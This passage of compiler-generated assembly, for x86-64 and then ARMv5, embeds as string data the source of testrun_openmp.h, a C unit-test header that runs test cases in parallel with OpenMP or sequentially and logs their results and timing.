true;\n}\n\n/*--------------------" .ascii "--------------------------------------------------------*/\n" .ascii "\n/**\n Run a bunch of tests in parallel. This will r" .ascii "un all configured\n tests independently and return th" .ascii "e result of the test batch,\n once all tests are done" .ascii ".\n\n A clock of the batch runtime " .ascii "will be logged in addition to the\n result of the tes" .ascii "trun.\n\n @param function pointer to function" .ascii " pointer array\n @param items amount of it" .ascii "ems in functions\n @returns negative c" .ascii "ount of failed tests\n positi" .ascii "ve count of run tests otherwise\n */\nstatic inline int64_t " .ascii "testrun_parallel(\n int (*functions[])(),\n si" .ascii "ze_t items) {\n\n if (!functions || items < 1)\n " .ascii " return 0;\n\n if (items > INT64_MAX )\n " .ascii " return 0;\n\n int64_t c_OK = 0;\n " .ascii " int64_t c_NOK = 0;\n\n clock_t start, end;\n " .ascii " start = clock();\n\n int nthreads = 0, tid = 0;\n\n\n" .ascii " /*\n * Use this if you want to reduce o" .ascii "r set the number of threads\n *\n * omp" .ascii "_set_dynamic(0);\n * omp_set_num_threads(1);\n " .ascii " */\n\n #pragma omp parallel for\n for " .ascii "(size_t i = 0; i < items; i++){\n\n if (nthre" .ascii "ads == 0){\n tid = omp_get_thread_num" .ascii "();\n if (tid == 0)\n " .ascii " nthreads = omp_get_num_threads();\n " .ascii " }\n\n if (functions[i] != 0) {\n\n " .ascii " if (functions[i]() < 0){\n " .ascii " #pragma omp atomic\n " .ascii " c_NOK++;\n } else {\n " .ascii " #pragma omp atomic\n " .ascii " c_OK++;\n }\n " .ascii " }\n }\n\n testrun_log(\"------------" .ascii "---------------------------------------------\");\n t" .ascii "estrun_log(\"NOTE PARALLEL TESTING\");\n testrun_log(" .ascii "\"\");\n testrun_log(\"This version is using OpenMP. " .ascii "Using GCC for compilation \");\n testrun_log(\"may pr" .ascii "oduce false valgrind output due to use of libomp.\");\n " .ascii " testrun_log(\"More information is included in docs/valgri" .ascii "nd/openMP.\");\n testrun_log(\"----------------------" .ascii "---------------------------------" .ascii "--\");\n\n\n testrun_log(\"Parallel RUN (%jd) TESTS i" .ascii "n %d threads: \"\n \"success %jd error %jd)\"" .ascii ",\n c_OK + c_NOK, nthreads,\n " .ascii "c_OK, c_NOK);\n\n end = clock();\n testrun_log" .ascii "_clock(start, end);\n testrun_log(\"\");\n\n i" .ascii "f (c_NOK > 0)\n return -c_NOK;\n\n ret" .ascii "urn c_OK;\n}\n\n/*------------------------------------------" .ascii "----------------------------------*/\n\n/**\n Run a b" .ascii "unch of tests serial. This will run all configured\n " .ascii "tests independently and return the result of the test batch," .ascii "\n once all tests are done or the first tests fails, " .ascii "if break_on_error\n is set.\n\n A clock of the" .ascii " batch runtime will be logged in addition to the\n re" .ascii "sult of the testrun.\n\n @param function poin" .ascii "ter to function pointer array\n @param items " .ascii " amount of items in function\n @param break_on_erro" .ascii "r (true) fail test batch on first error\n " .ascii " (false) run all tests before error return\n " .ascii " @returns negative count of failed tests" .ascii "\n positive count of run test" .ascii "s otherwise\n */\nstatic inline int64_t testrun_sequential(\n" .ascii " int (*functions[])(),\n size_t items,\n " .ascii " bool break_on_error) {\n\n if (!functions || items " .ascii "< 1)\n return 0;\n\n if (items > INT64" .ascii "_MAX )\n return 0;\n\n int64_t c_OK =" .ascii " 0;\n int64_t c_NOK = 0;\n\n clock_t start, en" .ascii "d;\n start = clock();\n\n for (size_t i = 0; i" .ascii " < items; i++){\n\n if (functions[i] != 0) {\n" .ascii "\n if (functions[i]() < 0) {\n\n " .ascii " c_NOK++;\n " .ascii " if (break_on_error)\n " .ascii " break;\n\n } else {\n\n " .ascii " c_OK++;\n\n " .ascii " }\n }\n }\n\n testrun_log(\"" .ascii "Serial RUN (%jd) TESTS: success %jd e" .ascii "rror %jd)\",\n c_OK + c_NOK,\n " .ascii " c_OK, c_NOK);\n\n end = clock();\n testrun_lo" .ascii "g_clock(start, end);\n testrun_log(\"\");\n\n " .ascii "if (c_NOK > 0)\n return -c_NOK;\n\n re" .ascii "turn c_OK;\n}\n\n/*-----------------------------------------" .ascii "-----------------------------------*/\n\n/**\n Run a " .ascii "bunch of configurable parallel and sequential tests serial.\n" .ascii "\n @param max_parallel maximum test cases paralle" .ascii "l\n @param max_sequential maximum test cases sequen" .ascii "tial\n @param break_on_error (true) fail sequential" .ascii " test batch on first error\n " .ascii "(false) run all sequential tests\n @returns " .ascii " negative count of run tests cased on error\n " .ascii " positive count of run tests\n */\nstat" .ascii "ic inline int64_t testrun_run_tests(\n size_t max_par" .ascii "allel,\n size_t max_sequential,\n bool break_o" .ascii "n_error) {\n\n int64_t result_parallel = 0;\n " .ascii " int64_t result_sequential = 0;\n size_t counter_par" .ascii "allel = 0;\n size_t counter_sequential = 0;\n\n " .ascii " if ( (max_parallel == 0) && (max_sequential == 0))\n " .ascii " return -1;\n\n // LOAD & RUN test cases\n" .ascii "\n if (max_parallel > 0) {\n\n int (*t" .ascii "estcases[max_parallel])();\n testrun_init_tes" .ascii "tcases(testcases, 0, max_parallel);\n\n if (!" .ascii "testrun_configure_parallel(\n testcas" .ascii "es, &counter_parallel, &max_parallel)){\n " .ascii " testrun_log_failure(\"Failure configure parallel.\");\n" .ascii " return -1;\n }\n\n " .ascii " result_parallel = testrun_parallel(testcases, c" .ascii "ounter_parallel);\n\n if (result_parallel < 0" .ascii ")\n testrun_log(\"Failure testrun par" .ascii "allel run\");\n\n }\n\n if (max_sequential > 0" .ascii ") {\n\n int (*testcases[max_sequential])();\n" .ascii " testrun_init_testcases(testcases, 0, max_seq" .ascii "uential);\n\n i" .ascii "f (!testrun_configure_sequential(\n t" .ascii "estcases, &counter_sequential, &max_sequential)){\n " .ascii " testrun_log_failure(\"Failure configure seque" .ascii "ntial.\");\n return -1;\n " .ascii " }\n\n result_sequential = testrun_sequent" .ascii "ial(\n testcases, counter_sequential," .ascii " break_on_error);\n\n if (result_sequential <" .ascii " 0)\n testrun_log(\"Failure testrun s" .ascii "equential run\");\n\n }\n\n if ( (result_paral" .ascii "lel < 0) || (result_sequential < 0)) {\n if (" .ascii " (counter_parallel + counter_sequential) == 0)\n " .ascii " return -1;\n return ( -1 * (count" .ascii "er_parallel + counter_sequential));\n }\n\n re" .ascii "turn (counter_parallel + counter_sequential);\n}\n\n/** " .ascii "------------------------------------------------------------" .ascii "-----------\n\n @example testrun_assert_exampl" .ascii "e.c\n @author Markus Toepfer\n @date " .ascii " 2017-10-31\n\n @brief Example test " .ascii "file using testrun.h\n\n This example shows assert() " .ascii "style based testing with testrun.h and is\n build aro" .ascii "und the testrun_test() macro, which increases a counter whic" .ascii "h\n MUST be initialized in a testcluster function.\n\n" .ascii " ----------------------------------------------------" .ascii "-------------------\n\n @code\n #include \"../" .ascii "tools/testrun_parallel.h\"\n\n bool example_function(" .ascii ") {\n return true;\n }\n ------" .ascii "------------------------------------------------------------" .ascii "-----\n\n int test_with_assert_function() {\n\n " .ascii " // Fail on first testing\n //\n" .ascii " // Fail on first can be implemented usin" .ascii "g assert,\n // or by returning a negative" .ascii " result of the testrun_test\n // The foll" .ascii "owing examples do all the same, the will stop\n " .ascii " // the whole testrun and report a failure.\n\n " .ascii " testrun_as" .ascii "sert(\n example_function() == true, \\" .ascii "\n \"Failure: NOK result is true.\"\n" .ascii " );\n\n assert(true == example" .ascii "_function());\n assert(example_function());\n" .ascii "\n if (!example_function())\n " .ascii " return -1;\n\n // will not be reached" .ascii " in case of error\n return testrun_log_succes" .ascii "s();\n }\n\n ---------------------------------" .ascii "--------------------------------------\n\n int test_w" .ascii "hatever_OK() {\n\n bool failure = false;\n\n " .ascii " // Positive result logging\n\n " .ascii " if (!failure)\n return testrun_log_s" .ascii "uccess();\n\n // will be reached in case of e" .ascii "rror\n return testrun_log_error();\n }" .ascii "\n\n ------------------------------------------------" .ascii "-----------------------\n\n int test_whatever_NOK() {" .ascii "\n\n // Failure logging (Don't fail the testr" .ascii "un, just log a failure)\n\n if (failure)\n " .ascii " return testrun_log_error();\n\n " .ascii " // will not be reached in case of error\n " .ascii " return testrun_log_success();\n\n }\n\n -" .ascii "------------------------------------------------------------" .ascii "----------\n\n int assert_based_testing() {\n\n " .ascii " testrun_init();\n\n testrun_test(te" .ascii "st_with_assert_function);\n testrun_test(test" .ascii "_whatever_OK);\n testrun_test(test_whatever_N" .ascii "OK);\n\n return testrun_counter;\n\n }" .ascii "\n\n testrun_run(assert_based_testing);\n @end" .ascii "code\n\n**/\n/** ---------------------------------------" .ascii "--------------------------------\n\n @example " .ascii "testrun_example.c\n @author Markus Toepfer\n " .ascii " @date 2017-11-22\n\n @brief " .ascii " Example test file using testrun.h\n\n This example s" .ascii "hows parallel and sequential style based testing\n wi" .ascii "th testrun.h and is build around " .ascii "a MACRO set to execute tests in\n parallel or seqentu" .ascii "ial run.\n\n //--------------------------------------" .ascii "-------------------------------\n\n @code\n #i" .ascii "nclude \"../tools/testrun_parallel.h\"\n\n bool examp" .ascii "le_function() {\n return true;\n }\n\n" .ascii " //--------------------------------------------------" .ascii "-------------------\n\n int testcase_block1(){\n\n " .ascii " testrun(example_function());\n t" .ascii "estrun(true);\n testrun(example_function(), \"" .ascii "second run of function.\");\n\n return testru" .ascii "n_log_success();\n }\n\n //-------------------" .ascii "--------------------------------------------------\n\n " .ascii " int testcase_block2(){\n\n return testrun_l" .ascii "og_success();\n }\n\n //----------------------" .ascii "-----------------------------------------------\n\n i" .ascii "nt testcase_block3(){\n\n return testrun_log_" .ascii "success();\n }\n\n //-------------------------" .ascii "--------------------------------------------\n\n Int " .ascii "testcase_block4(){\n\n return testrun_log_succ" .ascii "ess();\n }\n\n //-----------------------------" .ascii "----------------------------------------\n\n int64_t " .ascii "cluster_tests1(int(*tests[])(), size_t slot, size_t max) {\n" .ascii "\n testrun_init(); // create " .ascii "local variables\n testrun_add(testcase_block1" .ascii "); // adds block1 to tests[]\n testrun_add(" .ascii "testcase_block2); // adds block2 to tests[]\n\n " .ascii " return testrun_counter;\n }\n\n //-------" .ascii "------------------------------------------------------------" .ascii "--\n\n int64_t cluster_tests2(int(*tests[])(), size_t" .ascii " slot, size_t max) {\n\n testrun_init(); " .ascii " // create local variables\n testr" .ascii "un_add(testcase_block3); // adds block3 to tests[]\n " .ascii " testrun_add(testcase_block4); // adds block4 to " .ascii "tests[]\n\n return testrun_counter;\n " .ascii "}\n\n //--------------" .ascii "-------------------------------------------------------\n\n " .ascii " bool testrun_configure_parallel(\n int" .ascii " (*testcases[])(),\n size_t * const start,\n " .ascii " size_t const * const max){\n\n " .ascii " if (!testcases || !start || !max)\n " .ascii "return false;\n\n if(testrun_add_testcases(\n" .ascii " testcases,start, max, cluster_tests1" .ascii ") < 0)\n return false;\n\n " .ascii " return true;\n }\n\n //------------------" .ascii "---------------------------------------------------\n\n\n " .ascii " bool testrun_configure_sequential(\n int" .ascii " (*testcases[])(),\n size_t *const start,\n " .ascii " size_t const * const max){\n\n " .ascii "if (!testcases || !start || !max)\n r" .ascii "eturn false;\n\n if(testrun_add_testcases(\n " .ascii " testcases,start, max, cluster_tests1)" .ascii " < 0)\n return false;\n\n " .ascii " if(testrun_add_testcases(\n testc" .ascii "ases,start, max, cluster_tests2) < 0)\n " .ascii " return false;\n\n return true;\n\n " .ascii "}\n\n //-" .string "--------------------------------------------------------------------\n\n int64_t run_tests() {\n\n return testrun_run_tests(1000,1000,false);\n }\n\n testrun_run(run_tests);\n @endcode\n\n**/\n\n#endif /* testrun_openmp_h */\n" .section .data.rel.local,"aw" .align 8 .type helper_testrun_header_openmp, @object .size helper_testrun_header_openmp, 8 helper_testrun_header_openmp: .quad .LC0 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "287867.c" .text .section .rodata .align 2 .LC0: .ascii "/***\012 -----------------------------------" .ascii "-------------------------------------\012\012 " .ascii " Copyright 2017 Markus Toepfer\012\012 Lice" .ascii "nsed under the Apache License, Version 2.0 (the \"L" .ascii "icense\");\012 you may not use this file exc" .ascii "ept in compliance with the License.\012 You " .ascii "may obtain a copy of the License at\012\012 " .ascii " http://www.apache.org/licenses/LICENSE-2.0\012" .ascii "\012 Unless required by applicable law or ag" .ascii "reed to in writing, software\012 distributed" .ascii " under the License is distributed on an \"AS IS\" B" .ascii "ASIS,\012 WITHOUT WARRANTIES OR CONDITIONS O" .ascii "F ANY KIND, either express or implied.\012 S" .ascii "ee the License for the specific language governing " .ascii "permissions and\012 limitations under the Li" .ascii "cense.\012\012 This file is part of the test" .ascii "run project. http://testrun.info\012\012 ---" .ascii "---------------------------------------------------" .ascii "------------------\012 *//**\012\012 @file " .ascii " testrun_openmp.h\012 @author " .ascii " Markus Toepfer\012 @date 2017-11" .ascii "-17\012\012 @brief Serial and paral" .ascii "lel test executing framework with or\012 " .ascii " without assertion based testing.\012\012" .ascii " This is an enhanced and compatible version " .ascii "of the initial idea of an\012 small and simp" .ascii "le C89 compatible C unittest header (@see testrun.h" .ascii ")\012\012 For parallel test runs, this frame" .ascii "work makes use of OpenMP. Therefore\012 the " .ascii "code MUST be compiled with -fopenmp, otherwise the " .ascii "code will stay\012 unparallel and execution " .ascii "sequential.\012\012 @NOTE to use all provide" .ascii "d functionality of the header, tests SHOULD be\012 " .ascii " compiled using:\012\012 -fope" .ascii "nmp (parallel execution) and\012 " .ascii "-rdynamic (function name backtracing)\012\012 " .ascii " @NOTE Valgrind based file execution in libomp b" .ascii "ased OpenMP scenarios\012 may not work, @see" .ascii " docs/valgrind/openMP/README.MD for additional\012 " .ascii " information.\012\012 ----------------" .ascii "---------------------------------------------------" .ascii "-----\012 */\012\012#ifndef testrun_openmp_h\012#de" .ascii "fine te" .ascii "strun_openmp_h\012\012#include <omp.h> " .ascii " /* OpenMP parallel (part of GCC, Clang/LLVM) */\012" .ascii "\012#include <stdbool.h> /* C99 */\012#i" .ascii "nclude <stdint.h> /* C99 */\012\012#inc" .ascii "lude <unistd.h> /* C89/C90 */\012#inclu" .ascii "de <stdlib.h> /* C89/C90 */\012#include" .ascii " <stdio.h> /* C89/C90 */\012#include <" .ascii "string.h> /* C89/C90 */\012#include <er" .ascii "rno.h> /* C89/C90 */\012#include <time" .ascii ".h> /* C89/C90 */\012#include <assert" .ascii ".h> /* C89/C90 */\012\012#if defined(__" .ascii "GLIBC__)\012#include <execinfo.h> /* Gnul" .ascii "ib backtrace of function pointer names */\012#endif" .ascii "\012\012#define TESTRUN_DEFAULT_CLUSTER_MAX 1000\012" .ascii "\012/*---------------------------------------------" .ascii "-------------------------------*/\012\012/**\012 " .ascii " Error initialization of none error.\012*/\012#" .ascii "define testrun_errno() \\\012 (errno == 0 ? " .ascii "\"NONE\" : strerror(errno))\012\012/*-------------" .ascii "---------------------------------------------------" .ascii "------------*/\012\012/**\012 Log a failure." .ascii " Failure: Inability to perform a function as expect" .ascii "ed.\012*/\012#define testrun_log_failure(msg, ...) " .ascii "\\\012 fprintf(stderr, \"\\t[FAIL]\\t%s line" .ascii ":%d errno:%s message: \" msg \"\\n\",\\\012 " .ascii "__FUNCTION__, __LINE__, testrun_errno(), ##__VA_ARG" .ascii "S__)\012\012/*-------------------------------------" .ascii "---------------------------------------*/\012\012/*" .ascii "*\012 Log an error. Error: Difference betwee" .ascii "n expected and actual result.\012*/\012#define test" .ascii "run_log_error(msg, ...) \\\012 fprintf(stder" .ascii "r, \"\\t[ERROR]\\t%s line:%d errno:%s message: \" m" .ascii "sg \"\\n\",\\\012 __FUNCTION__, __LINE__, te" .ascii "strun_errno(), ##__VA_ARGS__)\012\012/*------------" .ascii "---------------------------------------------------" .ascii "-------------*/\012\012#define testrun_log_success(" .ascii "msg, ...) \\\012 fprintf(stdout, \"\\t[OK] \\" .ascii "t%s \" msg \"\\n\", __FUNCTION__, ##__VA_ARGS__)\012" .ascii "\012/*---------------------------------------------" .ascii "-------------------------------*/\012\012#define te" .ascii "strun_log(msg, ...) \\\012 fprintf(stdout, \"" .ascii "\\t\" msg \"\\n\", ##__VA_ARGS__)\012\012/*--------" .ascii "---------------------------------------------------" .ascii "-------" .ascii "----------*/\012\012#define testrun_log_function_in" .ascii "fo(msg, ...) \\\012 fprintf(stdout, \"\\t[IN" .ascii "FO] \\t%s line:%d message: \" msg \"\\n\", \\\012 " .ascii " __FUNCTION__, __LINE__, ##__VA_ARGS__" .ascii ")\012\012/*----------------------------------------" .ascii "------------------------------------*/\012\012#defi" .ascii "ne testrun_log_clock(start, end) \\\012 fpri" .ascii "ntf(stdout, \"\\tClock ticks function: ( %s ) | %f " .ascii "| %.0f ms \\n\",\\\012 __func__, \\\012 " .ascii " ((double)(end - start)) / CLOCKS_PER_SEC, \\\012" .ascii " (((double)(end - start)) / CLOCKS_PER_SEC )" .ascii " * 1000)\012\012/*---------------------------------" .ascii "-------------------------------------------\012 *\012" .ascii " * Block of supporting MACROS for assert based" .ascii " testing.\012 *\012 * Assert based testing is " .ascii "build around the principle to bundle and\012 * " .ascii " define some testcases, which will be run in series" .ascii ".\012 * Within the testcases testrun_assert()," .ascii " or assert() may be used to\012 * stop testing" .ascii ".\012 *\012 * --------------------------------" .ascii "---------------------------------\012 *\012 * " .ascii "Example usage:\012 *\012 * int testcase1_funct" .ascii "ion(){\012 * assert(true);\012 * " .ascii " return testrun_log_success();\012 * }\012" .ascii " *\012 * int testcase1_function(){\012 * " .ascii " testrun_assert(true, \"additional info an f" .ascii "ailure.\");\012 * return testrun_log_s" .ascii "uccess();\012 * }\012 *\012 * int testser" .ascii "ies() {\012 *\012 * testrun_init();\012" .ascii " *\012 * testrun_test(testcase1_functi" .ascii "on);\012 * testrun_test(testcase2_func" .ascii "tion);\012 *\012 * return testrun_coun" .ascii "ter;\012 * }\012 *\012 * testrun_run(test" .ascii "series);\012 *\012 *-------------------------------" .ascii "---------------------------------------------*/\012" .ascii "\012#define testrun_init() \\\012 int resul" .ascii "t = 0; \\\012 int testrun_counter = 0;\012\012" .ascii "/*-------------------------------------------------" .ascii "---------------------------*/\012\012/**\012 " .ascii " Wrapper around assert, which adds a message level " .ascii "to assert, to provide\012 additional and rel" .ascii "ated information e.g. a failure description.\012\012" .ascii " @param test an actual test case e.g. (1" .ascii " =" .ascii "= 0)\012 @param message additional message " .ascii "to log e.g. \"Failure: 1 is not one\"\012*/\012#def" .ascii "ine testrun_assert(test, ... )\\\012 if (!(t" .ascii "est)) { testrun_log_error(__VA_ARGS__); assert(test" .ascii "); }\012\012/*-------------------------------------" .ascii "---------------------------------------*/\012\012/*" .ascii "*\012 Run a single test (execute a function " .ascii "pointer. Runs a test function.\012 On non ne" .ascii "gative return value of the function run, a testrun_" .ascii "counter\012 is increased, on negative result" .ascii ", the negative result will be returned.\012\012 " .ascii " @param test function pointer of the test to" .ascii " run\012 @NOTE The surrounding blo" .ascii "ck is left on negative result of the\012 " .ascii " function pointer execution.\012*/\012#" .ascii "define testrun_test(test)\\\012 result = tes" .ascii "t(); testrun_counter++; if (result < 0) return resu" .ascii "lt;\012\012/*--------------------------------------" .ascii "--------------------------------------*/\012\012/**" .ascii "\012 Runs a function pointer, which SHALL co" .ascii "ntain the test function pointers\012 to run." .ascii " The function pointer is wrapped in a main procedur" .ascii "e, which and\012 allows indepentent testruns" .ascii " of the input testcluster over external\012 " .ascii "execution.\012\012 A clock will be started, " .ascii "as soon as the main is executed and the the\012 " .ascii " time is stopped again, at the end of the execut" .ascii "ion. The difference\012 will be printed and " .ascii "is the runtime of the whole input testcluster.\012\012" .ascii " A run will fail, as soon as one of the test" .ascii "s in the testcluster fails.\012 (Fail on fir" .ascii "st) or will run all functions dependent on the test" .ascii "setup.\012\012 @param testcluster funct" .ascii "ion pointer to be executed.\012*/\012#define testru" .ascii "n_run(testcluster) int main(int argc, char *argv[])" .ascii " {\\\012 argc = argc;\\\012 clock_t s" .ascii "tart1_t, end1_t; \\\012 start1_t = clock(); " .ascii "\\\012 testrun_log(\"\\ntestrun\\t%s\", argv" .ascii "[0]);\\\012 int64_t result = testcluster();\\" .ascii "\012 if (result > 0) \\\012 t" .ascii "estrun_log(\"ALL TESTS RUN (%jd tests)\", result);\\" .ascii "\012 end1_t = clock(); \\\012 testrun" .ascii "_log_clock" .ascii "(start1_t, end1_t); \\\012 testrun_log(\"\")" .ascii ";\\\012 result >= 0 ? exit(EXIT_SUCCESS) : e" .ascii "xit(EXIT_FAILURE); \\\012}\012\012/*---------------" .ascii "---------------------------------------------------" .ascii "----------\012 *\012 * Block of supporting MAC" .ascii "ROS an inline functions for sequntial and\012 * " .ascii " parallel testing. Most of the functionality is re" .ascii "alted to configure\012 * testseries for parall" .ascii "el and/or sequential runs. Which functions may\012 " .ascii "* be run as parallel tests or sequential tests" .ascii ", is up to the test\012 * developer.\012 *\012" .ascii " * This type of testing is highly customizable" .ascii " and may be adapted\012 * and customized by ea" .ascii "ch test module implementation.\012 *\012 * ---" .ascii "---------------------------------------------------" .ascii "-----------\012 *\012 * An implementation MUST" .ascii " to support the testrun_fun_tests() function\012 * " .ascii " is the implementation of the configure functio" .ascii "ns. These functions\012 * define, which testse" .ascii "ries may be run in parallel and which sequential.\012" .ascii " *\012 * bool testrun_configure_parall" .ascii "el(\012 * int (*testcases[])()" .ascii ",\012 * size_t * const start,\012" .ascii " * size_t const * const max);\012" .ascii " *\012 * as well as\012 *\012 * b" .ascii "ool testrun_configure_sequential(\012 * " .ascii " int (*testcases[])(),\012 * " .ascii " size_t * const start,\012 * " .ascii " size_t const * const max);\012 *\012 * -" .ascii "---------------------------------------------------" .ascii "-------------\012 *\012 * Example usage:\012 *" .ascii "\012 * int testcase1_function(){\012 * " .ascii " testrun(true);\012 * return test" .ascii "run_log_success();\012 * }\012 *\012 * in" .ascii "t testcase1_function(){\012 * testrun(" .ascii "true, \"additional info an failure.\");\012 * " .ascii " return testrun_log_success();\012 * }\012" .ascii " *\012 * int64_t testseries(int(*tests[])(), s" .ascii "ize_t slot, size_t max) {\012 *\012 * " .ascii "testrun_init();\012 *\012 * testrun_ad" .ascii "d(testcase1_function);\012 * testrun_a" .ascii "dd(testcase2_function);\012 *\012 * re" .ascii "turn testrun_counte" .ascii "r;\012 * }\012 *\012 * ------------------" .ascii "-----------------------------------------------\012" .ascii " *\012 * NOTE: Here we configure a testseries " .ascii "to be run sequential and parallel\012 *\012 * " .ascii "bool testrun_configure_parallel(\012 * " .ascii " int (*testcases[])(),\012 * " .ascii " size_t * const start,\012 * " .ascii " size_t const * const max){\012 *\012 * " .ascii " if (testrun_add_testcases(testcases,start,end" .ascii ",testseries) < 0)\012 * return" .ascii " false;\012 *\012 * return true;\012 *" .ascii "\012 * bool testrun_configure_sequential(\012 " .ascii "* int (*testcases[])(),\012 * " .ascii " size_t * const start,\012 * " .ascii " size_t const * const max){\012 *" .ascii "\012 * if (testrun_add_testcases(testc" .ascii "ases,start,end,testseries) < 0)\012 * " .ascii " return false;\012 *\012 * retu" .ascii "rn true;\012 *\012 * -------------------------" .ascii "----------------------------------------\012 *\012 " .ascii "* NOTE: This last function definition is neede" .ascii "d to configure the\012 * maximum amount of par" .ascii "allel and sequential tests as parameters\012 * " .ascii " instead of a predefinition.\012 *\012 * int64" .ascii "_t run_tests(){\012 * return testrun_r" .ascii "un_tests(1000,1000,false);\012 * }\012 *\012 *" .ascii " testrun_run(run_tests);\012 *\012 *----------" .ascii "---------------------------------------------------" .ascii "---------------*/\012\012/**\012 MUST be imp" .ascii "lemented to configure parallel tests.\012\012 " .ascii " @param testcases array of function pointer" .ascii "s\012 @param start first slot the" .ascii " be used in testcases\012 @param max " .ascii " maximum slots of testcases (last slot to be s" .ascii "et)\012 @returns true on succ" .ascii "ess, false on errror\012*/\012bool testrun_configur" .ascii "e_parallel(\012 int (*testcases[])(),\012 " .ascii " size_t * const start,\012 size_t const " .ascii "* const max);\012\012/*----------------------------" .ascii "------------------------------------------------*/\012" .ascii "\012/**\012 MUST be implemented to configure" .ascii " sequential tests.\012\012 @param testcases " .ascii " array of function pointer" .ascii "s\012 @param start first slot the" .ascii " be used in testcases\012 @param max " .ascii " maximum slots of testcases (last slot to be s" .ascii "et)\012 @returns true on succ" .ascii "ess, false on errror\012*/\012bool testrun_configur" .ascii "e_sequential(\012 int (*testcases[])(),\012 " .ascii " size_t * const start,\012 size_t cons" .ascii "t * const max);\012\012/*--------------------------" .ascii "--------------------------------------------------*" .ascii "/\012\012/**\012 Run a single atomar test. R" .ascii "eturn the surrounding block on error.\012 Th" .ascii "is function will leave the context block running on" .ascii " error. The\012 Mindset is a defused assert." .ascii " LEAVE THE FUNCTION NOT THE PROGRAM.\012\012 " .ascii " @param test Boolean decision input.\012*/\012#" .ascii "define testrun_check(test, ... )\\\012 if (!" .ascii "(test)) { testrun_log_error(__VA_ARGS__); return -" .ascii "1;}\012\012/*--------------------------------------" .ascii "--------------------------------------*/\012\012/**" .ascii "\012 Alias to @see testrun_check.\012*/\012#" .ascii "define testrun(test, ...)\\\012 testrun_chec" .ascii "k(test, __VA_ARGS__ )\012\012/*--------------------" .ascii "---------------------------------------------------" .ascii "-----*/\012\012/**\012 Add a new test to the" .ascii " tests array. This is a convinience function\012 " .ascii " to add a function pointer to the array tests[]" .ascii ". This MACRO uses\012 block variables **slot" .ascii "**, **testrun_counter**, **max** and **tests[]**.\012" .ascii "\012 @param test function pointer to a n" .ascii "ew test to be added.\012*/\012#define testrun_add(t" .ascii "est) \\\012 if (slot + testrun_counter == m" .ascii "ax) { \\\012 testrun_log_failure(\"A" .ascii "ll test slots filled, \" \\\012 " .ascii " \"check config TESTS[MAX].\"); \\\012 " .ascii " if (testrun_counter == 0) \\\012 " .ascii " return -1; \\\012 return " .ascii "-testrun_counter; \\\012 } else { \\\012 " .ascii " tests[slot + testrun_counter] = test; \\" .ascii "\012 testrun_counter++; \\\012 " .ascii " }\012\012/*--------------------------------------" .ascii "--------------------------------------*/\012\012/**" .ascii "\012 Array initialization to point to NULL.\012" .ascii "\012 @param array array to" .ascii " be initialized\012 @param start first it" .ascii "em to set to NULL\012 @param end last i" .ascii "tem to set to NULL\012*/\012#define testrun_init_te" .ascii "stcases(array, start, end, ...) \\\012 for (" .ascii "size_t i = start; i < end; i++ ) { array[i] = NULL;" .ascii " }\012\012/*---------------------------------------" .ascii "-------------------------------------*/\012\012/**\012" .ascii " Add some test cases to a testcase function " .ascii "pointer array, using\012 a user provided fun" .ascii "ction to add the testcases.\012\012 Function" .ascii " will log the result of testcases added.\012\012 " .ascii " @param tests pointer to function po" .ascii "inter array\012 @param last poin" .ascii "ter to counter of last set item\012 @param m" .ascii "ax pointer to value of max items\012 " .ascii " @param function function to add the t" .ascii "ests to the array\012\012 @returns " .ascii " negative count of testcases to add\012 " .ascii " positive count of added te" .ascii "stcases\012 */\012static inline int64_t testrun_add" .ascii "_testcases(\012 int (*tests[])(),\012 " .ascii " size_t * const last,\012 size_t const * con" .ascii "st max,\012 int64_t (*function)(int (*tests[" .ascii "])(), size_t, size_t)){\012\012 if (!tests |" .ascii "| !function || !last || !max)\012 re" .ascii "turn -1;\012\012 if (*last > *max)\012 " .ascii " return -1;\012\012 int64_t r = 0;\012" .ascii "\012 r = function(tests, *last, *max);\012\012" .ascii " if (r < 0) {\012\012 // rein" .ascii "it all from last to end to NULL\012 " .ascii "testrun_init_testcases(tests, *last, *max);\012\012" .ascii " testrun_log_failure(\012 " .ascii " \"Failed to add tests to TESTS[] \"\012" .ascii " \"(usage %jd/%jd)\",\012 " .ascii " *last, *max);\012\012 " .ascii " return -1;\012\012 } else {\012\012 " .ascii " *last += r;\012 testru" .ascii "n_log_function_info(\012 \"a" .ascii "dded %jd tests to TESTS[]\"\012 " .ascii " \"(usage %jd/%jd)\",\012 " .ascii " r, *last, *max);\012 }\012\012 retur" .ascii "n r;\012\012}\012\012/*----------------------------" .ascii "------------------------------------------------*/" .ascii "\012\012/**\012 Dumb the test cases to stdou" .ascii "t.\012\012 To enable a backtrace with names," .ascii " the file MUST be compiled with\012 MODCFLAG" .ascii "S += -rdynamic\012\012 @param function " .ascii " pointer to function pointer array\012 @pa" .ascii "ram items amount of items in functions\012" .ascii " @param names bool to try to back" .ascii "trace names\012 @returns nega" .ascii "tive count of failed tests\012 " .ascii " positive count of run tests otherwise\012" .ascii " */\012static inline bool testrun_dump_testcases(\012" .ascii " int (*functions[])(),\012 size_t max" .ascii ",\012 bool names) {\012\012 if (!func" .ascii "tions || max < 1)\012 return false;\012" .ascii "\012 void *pointer = NULL;\012\012 //" .ascii " dump is formated to fit to standard header log and" .ascii " to dump 20 digits\012 fprintf(stdout, \"\\t" .ascii "[DUMP]\\ttestcases tests[%jd]\\n\", max);\012 " .ascii " if (names){\012 #if defined(__GLIB" .ascii "C__)\012 fprintf(stdout, \"\\" .ascii "t[DUMP]\\t ... try to backtrace\\n\");\012 " .ascii " #else\012 fprintf(std" .ascii "out, \"\\t[DUMP]\\t ... names not implemented\\n\")" .ascii ";\012 #endif\012 }\012\012 " .ascii " for (size_t i = 0; i < max; i++) {\012\012 " .ascii " pointer = (void*) functions[i];\012\012" .ascii " if (names) {\012 " .ascii " #if defined(__GLIBC__)\012 " .ascii " backtrace_symbols_fd(&pointer, 1, STDOU" .ascii "T_FILENO);\012 #else\012 " .ascii " // fallback to printf\012" .ascii " fprintf(stdout, \"%" .ascii "20jd %p \\n\", i, pointer);\012 " .ascii " 